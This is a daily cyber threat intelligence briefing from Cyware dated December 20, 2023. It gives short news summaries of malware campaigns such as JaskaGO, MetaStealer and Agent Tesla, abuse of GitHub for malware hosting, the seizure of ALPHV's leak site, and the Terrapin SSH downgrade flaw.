We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Dec 20, 2023

Malware galore! A newly discovered sophisticated malware strain, JaskaGO, crafted in Golang, has emerged as a threat to both Windows and macOS. Equipped with advanced capabilities, including anti-VM measures, JaskaGO targets users through deceptive spear-phishing campaigns. On the other hand, MetaStealer, derived from the RedLine codebase, is gaining notoriety in the cybercriminal landscape. It has become a sought-after tool particularly for stealing valuable data and facilitating future ransomware attacks.

GitHub has become a new hub for malware authors. Adversaries were spotted abusing GitHub Gists and Git commit messages to host and execute malicious code. Simultaneously, a malspam threat hovers over the hospitality industry to deliver Redline Stealer or Vidar Stealer malware via social engineering tactics.

Top Breaches Reported in the Last 24 Hours

Malware campaign steals from 40 banks

IBM uncovered a new attack campaign that utilized JavaScript web injection techniques to target users of 40 banks across North America, South America, Europe, and Japan. The malicious script would help criminals modify webpage content, capture login credentials, and intercept OTPs, which attackers could leverage to log in to the victim's banking account to perform unauthorized transactions. Attackers have already compromised the banking details of over 50,000 users.

Top Malware Reported in the Last 24 Hours

Microsoft Excel exploited in malware campaign

Threat actors were found targeting vulnerable versions of Microsoft Excel to deploy Agent Tesla. The attack involves spam emails containing malicious attachments with strategically chosen words like "orders" and "invoices" to deceive users. The infection sequence includes an obfuscated VBS file, a JPG file with a Base64-encoded DLL, and the execution of PowerShell and RegAsm.exe. Agent Tesla payload is used for browser data theft and credentials from mail clients and FTP applications.

Law enforcement seizes ALPHV's leak site

A coordinated effort led by the FBI, with support from law enforcement agencies globally, has seized the dark web leak site of the notorious ransomware gang ALPHV, also known as BlackCat. The operation involved the disruption of ALPHV's infrastructure and the release of a decryption tool, enabling over 500 victims to restore their systems. ALPHV is responsible for compromising over 1,000 worldwide victims and targeting critical infrastructure.

MetaStealer now spreads through malicious ads

MetaStealer, which emerged in 2022, has transitioned from traditional distribution methods like malspam and compromised YouTube accounts to a malvertising campaign. Researchers from Malwarebytes discovered this shift in tactics and observed the malware being distributed through deceptive ads for popular software like Notepad++ and AnyDesk. The malware authors hinted at the release of an enhanced version in a recent interview.

Malware authors abuse GitHub

Security researchers have identified two novel techniques employed by malware authors to leverage GitHub for hosting and command execution. The first technique involves abusing GitHub Gists, a feature that allows developers to share code snippets easily. Malicious code is hidden within PyPI packages, presenting itself as libraries for network proxying. The second technique involves sending commands through Git commit messages. Malicious code hidden in the setup.py file allows the execution of commands from a cloned GitHub repository based on specific commit messages.

Hospitality industry warned of malspam attacks

Sophos X-Ops issued a warning to the global hospitality industry regarding a sophisticated malspam campaign targeting hotels. The campaign employs social engineering tactics, sending hotel representatives email complaints about service problems or requests for information. These emails contain links to password-protected archives hosted on public cloud storage platforms, leading to malware such as Redline Stealer or Vidar Stealer.

Advanced Go Malware threatens Windows and macOS

A sophisticated malware strain named JaskaGO poses a serious threat to both Windows and macOS systems. Discovered by AT&T Alien Labs, the malware exhibits low detection rates by traditional antivirus solutions, making it a potent threat adversary. JaskaGO is adept at exfiltrating valuable information, including browser credentials, cryptocurrency wallet details, and sensitive user files. The malware demonstrates anti-VM measures and establishes persistence through various methods.

Top Vulnerabilities Reported in the Last 24 Hours

SSH protocol flaw allows downgrade attacks

Researchers from Ruhr University Bochum identified an attack method exploiting a vulnerability in the SSH protocol. Named Terrapin Attack, adversaries could force SSH clients to use weaker authentication methods and disable certain defense mechanisms. The attack involves injecting a plaintext "ignore" message into the pre-secure connection during the handshake, leading to the downgrade of the connection's security.

Related Threat Briefings